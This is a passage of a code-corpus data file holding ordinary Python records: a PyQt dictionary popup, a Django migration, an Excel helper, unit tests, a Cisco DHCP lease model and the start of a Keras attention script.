+{"seq_id": "453249869", "text": "# encoding=utf-8\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nimport dict_meaning\nfrom dictionary_ui import Ui_MainWindow\n\nclass MainWindow(QMainWindow):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tclipboard = QApplication.clipboard()\n\t\tclipboard.dataChanged.connect(self.clipboard_change)\n\t\tself.ui = Ui_MainWindow()\n\t\tself.ui.setupUi(self)\n\t\tself.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint |\n\t\t\t\t\t\t\tQtCore.Qt.FramelessWindowHint\n\t\t\t\t\t\t\t# QtCore.Qt.WindowNoState \n\t\t\t\t\t\t\t# QtCore.Qt.Tool)\n\t\t)\n\t\tself.move(QApplication.desktop().width() - self.width(), QApplication.desktop().height() - self.height())\n\t\tself.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n\t\tself.show()\n\t\tQtWidgets.QShortcut(QtGui.QKeySequence(\"Esc\"), self, self.hide)\n\n\t\n\tdef search(self):\n\t\tword = self.ui.lineEdit.text()\n\t\tmeaning = dict_meaning.get_meaning(word)\n\t\tif meaning is not None:\n\t\t\ttext = ''\n\t\t\tfor i in meaning:\n\t\t\t\ttext += i\n\t\t\t\ttext += '\\n'\n\t\t\tself.ui.label.setText(text)\n\t\t\tself.ui.lineEdit.selectAll()\n\t\telse:\n\t\t\tself.ui.lineEdit.selectAll()\n\t\n\tdef clipboard_change(self):\n\t\tclipboard = QApplication.clipboard()\n\t\tdata = clipboard.mimeData()\n\t\tself.ui.lineEdit.setText(data.text())\n\t\tself.search()\n\t\tself.show()\n\t\t\n\nif __name__ == '__main__':\n\tapp = QApplication([])\n\twindow = MainWindow()\n\t# app.connect(window,window.close,app,app.quit)\n\t# app.quitOnLastWindowClosed()\n\tapp.exec()\n\t# sys.exit(0)", "sub_path": "dictionary.py", "file_name": "dictionary.py", "file_ext": "py", "file_size_in_byte": 1451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.clipboard", "line_number": 11, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 11, "usage_type": "name"}, {"api_name": "dictionary_ui.Ui_MainWindow", "line_number": 13, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 15, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.desktop", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 20, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QShortcut", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QKeySequence", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 23, "usage_type": "name"}, {"api_name": "dict_meaning.get_meaning", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.clipboard", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "629952684", "text": "# coding: utf-8\n# 2019/8/24 @ tongshiwei\n\n__all__ = [\"analysis_records\"]\n\nfrom tqdm import tqdm\nimport json\n\n\ndef analysis_records(source):\n ku_set = set()\n records_num = 0\n seq_count = 0\n correct_num = 0\n with open(source) as f:\n for line in tqdm(f, \"doing statistics\"):\n seq_count += 1\n responses = json.loads(line)\n records_num += len(responses)\n correct_num += len([r[1] for r in responses if int(r[1]) == 1])\n ku_set.update(set([_id for _id, _ in responses]))\n\n print(\"in %s\" % source)\n print(\"knowledge units number: %s\" % len(ku_set))\n print(\"records number: %s\" % records_num)\n print(\"correct records number: %s\" % correct_num)\n print(\"the number of sequence: %s\" % seq_count)\n\n\ndef analysis_edges(src, threshold=None):\n edge_num = 0\n\n with open(src) as f:\n graph_edges = json.load(f)\n\n for edge in graph_edges:\n if len(edge) == 2:\n edge_num += 1\n elif len(edge) >= 3:\n if threshold is None:\n edge_num += 1\n elif edge[2] >= threshold:\n edge_num += 1\n else: # pragma: no cover\n raise ValueError(\"each edge in src should have at least two element\")\n\n print(\"in %s\" % src)\n print(\"%s edges\" % edge_num)\n", "sub_path": "EduData/Task/KnowledgeTracing/statistics.py", "file_name": "statistics.py", "file_ext": "py", "file_size_in_byte": 1318, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tqdm.tqdm", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "489303678", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('miseenplace', '0003_recipestep'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RecipeIngredient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('quantity', models.FloatField()),\n ('ingredient', models.ForeignKey(to='miseenplace.Ingredient')),\n ('recipe', models.ForeignKey(to='miseenplace.Recipe')),\n ],\n ),\n migrations.AddField(\n model_name='recipe',\n name='recipe_ingredients',\n field=models.ManyToManyField(to='miseenplace.Ingredient', through='miseenplace.RecipeIngredient'),\n ),\n ]\n", "sub_path": "miseenplace/migrations/0004_auto_20151225_0629.py", "file_name": "0004_auto_20151225_0629.py", "file_ext": "py", "file_size_in_byte": 902, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "607953890", "text": "# -*- coding: utf-8 -*-\n# __author__:黄贝尔\n# 2021-04-24\nfrom openpyxl import load_workbook\n\nfrom config.VarConfig import excelpath\n\n\nclass Excel_tools:\n\n def read_work_book(self,filename):\n '''\n 加载文件\n :param filename: excel文件地址\n '''\n try:\n self.workbook=load_workbook(filename)\n except Exception as e:\n print(e)\n\n def read_work_sheet(self,sheetname):\n '''\n 通过表名获取表\n :param sheetname: 表名\n :return:\n '''\n try:\n self.sheet=self.workbook[sheetname]\n except Exception as e:\n print(e)\n\n def get_max_rows(self):\n '''\n 获取行数,从1开始\n :return:\n '''\n return self.sheet.max_row\n\n def get_max_col(self):\n '''\n 获取列数,从1开始\n :return:\n '''\n return self.sheet.max_column\n\n def get_row_data(self,row):\n '''\n 获取某一行的数据\n :param row: 行数\n :return:\n '''\n col = self.sheet.max_column\n row_data = []\n for i in range(1, col + 1):\n cell_value = self.sheet.cell(row=row, column=i).value\n row_data.append(cell_value)\n return row_data\n\n def get_specific_data(self,row,col):\n '''\n 获取具体单元格的值\n :return:\n '''\n cell_value=self.sheet.cell(row=row,column=col).value\n return cell_value\n\n def get_all_data(self):\n '''\n 获取sheet中所有内容\n :return:\n '''\n row1 = self.sheet.max_row\n row_datas = []\n for i in range(1, row1 + 1):\n value = self.get_row_data(i)\n row_datas.append(value)\n return row_datas\n\n def get_all_dic_data(self):\n '''\n 将第一行和下面每一条数据拼接成字典,每一行被一个字典包括,大字典的key是行数\n :return:\n '''\n frist = self.get_row_data(1)\n row1 = self.sheet.max_row\n row_datas= {}\n for i in range(2, row1 + 1):\n value = self.get_row_data(i)\n if value[0]!=None:\n datas=dict(zip(frist,value))\n row_datas[i]=datas\n return row_datas\n\n def write_specific_data(self,row,col,value):\n self.sheet.cell(row=row,column=col,value=value)\n self.workbook.save(excelpath)\n self.workbook.close()\n\n\nif __name__ == '__main__':\n data=Excel_tools()\n data.read_work_book(excelpath)\n data.read_work_sheet('Sheet1')\n # print(data.get_all_data())\n print(data.get_all_dic_data())\n #print(data.get_row_data(3))\n # data.write_specific_data(5,5,111)\n # print(data.get_specific_data(5,5))\n\n\n\n", "sub_path": "utils/exceltools.py", "file_name": "exceltools.py", "file_ext": "py", "file_size_in_byte": 2787, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 17, "usage_type": "call"}, {"api_name": "config.VarConfig.excelpath", "line_number": 96, "usage_type": "argument"}, {"api_name": "config.VarConfig.excelpath", "line_number": 102, "usage_type": "argument"}]}
+{"seq_id": "141951318", "text": "# Copyright (c) 2015 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Unittests for TaskFlow distributed_task driver implementation.\"\"\"\n\nimport mock\n\nfrom poppy.distributed_task.utils import memoized_controllers\nfrom tests.unit import base\n\n\nclass TestMemoizeUtils(base.TestCase):\n\n def setUp(self):\n super(TestMemoizeUtils, self).setUp()\n\n rax_dns_set_credentials = mock.patch('pyrax.set_credentials')\n rax_dns_set_credentials.start()\n self.addCleanup(rax_dns_set_credentials.stop)\n\n rax_dns = mock.patch('pyrax.cloud_dns')\n rax_dns.start()\n self.addCleanup(rax_dns.stop)\n\n def test_memoization_service_controller(self):\n service_controller_first = \\\n memoized_controllers.task_controllers('poppy')\n service_controller_cached = \\\n memoized_controllers.task_controllers('poppy')\n\n self.assertEqual(id(service_controller_first),\n id(service_controller_cached))\n\n def test_memoization_storage_controller(self):\n service_controller_first, storage_controller_first = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n service_controller_cached, storage_controller_cached = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n\n self.assertEqual(id(service_controller_first),\n id(service_controller_cached))\n self.assertEqual(id(storage_controller_first),\n id(storage_controller_cached))\n\n def test_memoization_dns_controller(self):\n service_controller_first, dns_controller_first = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n service_controller_cached, dns_controller_cached = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n\n self.assertEqual(id(service_controller_first),\n id(service_controller_cached))\n self.assertEqual(id(dns_controller_first),\n id(dns_controller_cached))\n", "sub_path": "tests/unit/distributed_task/utils/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 2566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tests.unit.base.TestCase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tests.unit.base", "line_number": 24, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 29, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 33, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 39, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 39, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 41, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 41, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 48, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 48, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 50, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 50, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 59, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 59, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 61, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 61, "usage_type": "name"}]}
+{"seq_id": "301587203", "text": "# Unless explicitly stated otherwise all files in this repository are licensed under the the Apache License Version 2.0.\n# This product includes software developed at Datadog (https://www.datadoghq.com/).\n# Copyright 2021 Datadog, Inc.\n\nfrom utils import BaseTestCase, context, released\nimport pytest\n\n\nif context.library == \"cpp\":\n pytestmark = pytest.mark.skip(\"not relevant\")\n\n\n@released(golang=\"?\", dotnet=\"?\", java=\"?\", nodejs=\"?\", php=\"?\", python=\"?\", ruby=\"?\")\nclass Test_Scrubbing(BaseTestCase):\n def test_basic(self):\n raise NotImplementedError\n", "sub_path": "tests/appsec/test_PII.py", "file_name": "test_PII.py", "file_ext": "py", "file_size_in_byte": 567, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.context.library", "line_number": 9, "usage_type": "attribute"}, {"api_name": "utils.context", "line_number": 9, "usage_type": "name"}, {"api_name": "pytest.mark.skip", "line_number": 10, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "utils.BaseTestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.released", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "645144217", "text": "# coding=UTF-8\n# **********************************************************************\n# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved\n# written by zen warriors, do not modify!\n# **********************************************************************\n\n\nfrom cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass Lease(Mo):\n \"\"\"\n The DHCP lease record.\n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.dhcp.Lease\")\n\n meta.moClassName = \"dhcpLease\"\n meta.rnFormat = \"lease-[%(ip)s]\"\n meta.category = MoCategory.REGULAR\n meta.label = \"Lease\"\n meta.writeAccessMask = 0x8008020040001\n meta.readAccessMask = 0x8008020040001\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n meta.childClasses.add(\"cobra.model.dhcp.RsClient\")\n\n meta.childNamesAndRnPrefix.append((\"cobra.model.dhcp.RsClient\", \"rsclient\"))\n\n meta.parentClasses.add(\"cobra.model.dhcp.LeaseDb\")\n\n meta.superClasses.add(\"cobra.model.nw.DbRec\")\n meta.superClasses.add(\"cobra.model.l3.DbRec\")\n meta.superClasses.add(\"cobra.model.nw.Conn\")\n meta.superClasses.add(\"cobra.model.nw.Item\")\n meta.superClasses.add(\"cobra.model.nw.GEp\")\n meta.superClasses.add(\"cobra.model.l3.ProtDbRec\")\n\n meta.rnPrefixes = [\n ('lease-', True),\n ]\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"circuitId\", \"circuitId\", 1141, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.range = [(0, 512)]\n meta.props.add(\"circuitId\", prop)\n\n prop = PropMeta(\"str\", \"clientId\", \"clientId\", 1139, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.range = [(0, 512)]\n meta.props.add(\"clientId\", prop)\n\n prop = PropMeta(\"str\", \"clientName\", \"clientName\", 1140, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.range = [(0, 512)]\n meta.props.add(\"clientName\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"end\", \"end\", 1137, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"end\", prop)\n\n prop = PropMeta(\"str\", \"hwAddr\", \"hwAddr\", 1138, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"hwAddr\", prop)\n\n prop = PropMeta(\"str\", \"ip\", \"ip\", 1134, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"ip\", prop)\n\n prop = PropMeta(\"str\", \"lcOwn\", \"lcOwn\", 9, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"local\"\n prop._addConstant(\"implicit\", \"implicit\", 4)\n prop._addConstant(\"local\", \"local\", 0)\n prop._addConstant(\"policy\", \"policy\", 1)\n prop._addConstant(\"replica\", \"replica\", 2)\n prop._addConstant(\"resolveOnBehalf\", \"resolvedonbehalf\", 3)\n meta.props.add(\"lcOwn\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"name\", \"name\", 16437, PropCategory.REGULAR)\n prop.label = \"Name\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 128)]\n meta.props.add(\"name\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"start\", \"start\", 1136, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"start\", prop)\n\n prop = PropMeta(\"str\", \"state\", \"state\", 1135, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"abandoned\", \"abandoned\", 5)\n prop._addConstant(\"active\", \"active\", 2)\n prop._addConstant(\"backup\", \"backup\", 7)\n prop._addConstant(\"bootp\", \"bootp\", 9)\n prop._addConstant(\"expired\", \"expired\", 3)\n prop._addConstant(\"free\", \"free\", 1)\n prop._addConstant(\"recovered\", \"recovered\", 10)\n prop._addConstant(\"released\", \"released\", 4)\n prop._addConstant(\"reserved\", \"reserved\", 8)\n prop._addConstant(\"reset\", \"reset\", 6)\n prop._addConstant(\"unknown\", \"unknown\", 0)\n meta.props.add(\"state\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n meta.namingProps.append(getattr(meta.props, \"ip\"))\n getattr(meta.props, \"ip\").needDelimiter = True\n\n def __init__(self, parentMoOrDn, ip, markDirty=True, **creationProps):\n namingVals = [ip]\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# ##################################################\n", "sub_path": "venv/Lib/site-packages/cobra/modelimpl/dhcp/lease.py", "file_name": "lease.py", "file_ext": "py", "file_size_in_byte": 6476, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cobra.mit.mo.Mo", "line_number": 22, "usage_type": "name"}, {"api_name": "cobra.mit.meta.ClassMeta", "line_number": 28, "usage_type": "call"}, {"api_name": "cobra.model.category.MoCategory.REGULAR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "cobra.model.category.MoCategory", "line_number": 32, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 59, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.CHILD_ACTION", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 59, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 68, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 68, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 75, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 75, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 82, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 82, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 82, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 89, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.DN", "line_number": 89, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 89, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 97, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 97, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 97, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 103, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 103, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 109, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 109, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 109, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 117, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 117, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 117, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 130, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 130, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 139, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 139, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 139, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 146, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.RN", "line_number": 146, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 146, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 154, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 154, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 154, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 160, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 160, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 160, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 177, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.STATUS", "line_number": 177, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 177, "usage_type": "name"}, {"api_name": "cobra.mit.mo.Mo.__init__", "line_number": 191, "usage_type": "call"}, {"api_name": "cobra.mit.mo.Mo", "line_number": 191, "usage_type": "name"}]}
+{"seq_id": "619091398", "text": "from typing import TYPE_CHECKING\n\nfrom tornado.web import RequestHandler\n\nfrom grouper.models.base.session import Session\nfrom grouper.perf_profile import FLAMEGRAPH_SUPPORTED, get_flamegraph_svg, InvalidUUID\n\nif TYPE_CHECKING:\n from typing import Any\n\n\n# Don't use GrouperHandler here as we don't want to count these as requests.\nclass PerfProfile(RequestHandler):\n def get(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n trace_uuid = kwargs[\"trace_uuid\"] # type: str\n if not FLAMEGRAPH_SUPPORTED:\n return self.send_error(\n status_code=404,\n reason=\"Performance profiles not supported (plop or pyflamegraph not installed)\",\n )\n\n try:\n flamegraph_svg = get_flamegraph_svg(Session(), trace_uuid)\n except InvalidUUID:\n pass\n else:\n self.set_header(\"Content-Type\", \"image/svg+xml\")\n self.write(flamegraph_svg)\n", "sub_path": "grouper/fe/handlers/perf_profile.py", "file_name": "perf_profile.py", "file_ext": "py", "file_size_in_byte": 960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 8, "usage_type": "name"}, {"api_name": "tornado.web.RequestHandler", "line_number": 13, "usage_type": "name"}, {"api_name": "grouper.perf_profile.FLAMEGRAPH_SUPPORTED", "line_number": 17, "usage_type": "name"}, {"api_name": "grouper.perf_profile.get_flamegraph_svg", "line_number": 24, "usage_type": "call"}, {"api_name": "grouper.models.base.session.Session", "line_number": 24, "usage_type": "call"}, {"api_name": "grouper.perf_profile.InvalidUUID", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "266964911", "text": "# -*- coding:utf-8 -*-\r\n\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\nimport keras\r\nfrom keras.initializers import RandomUniform\r\nfrom keras.layers import multiply\r\nfrom keras.layers.core import Reshape, Permute\r\nfrom keras.layers import BatchNormalization, Activation\r\nfrom keras.layers.core import Dense, Dropout, Lambda, Flatten\r\nfrom keras.layers.convolutional import Conv1D\r\nfrom keras.layers.embeddings import Embedding\r\nfrom keras.models import *\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\ndef attention(x, g, TIME_STEPS):\r\n \"\"\"\r\n inputs.shape = (batch_size, time_steps, input_dim)\r\n \"\"\"\r\n input_dim = int(x.shape[2])\r\n x1 = K.permute_dimensions(x, (0, 2, 1))\r\n g1 = K.permute_dimensions(g, (0, 2, 1))\r\n\r\n x2 = Reshape((input_dim, TIME_STEPS))(x1)\r\n g2 = Reshape((input_dim, TIME_STEPS))(g1)\r\n\r\n x3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(x2)\r\n g3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(g2)\r\n x4 = keras.layers.add([x3, g3])\r\n a = Dense(TIME_STEPS, activation='softmax', use_bias=False)(x4)\r\n a_probs = Permute((2, 1))(a)\r\n output_attention_mul = multiply([x, a_probs])\r\n return output_attention_mul\r\n\r\n\r\ndef loadData(data_file):\r\n data_list, label, negative, positive = [], [], [], []\r\n with open(data_file) as f:\r\n for line in f:\r\n ll = [i for i in line.strip().split(',')]\r\n label_item = np.float(ll[2])\r\n data_item = [int(i) for i in ll[3:]]\r\n 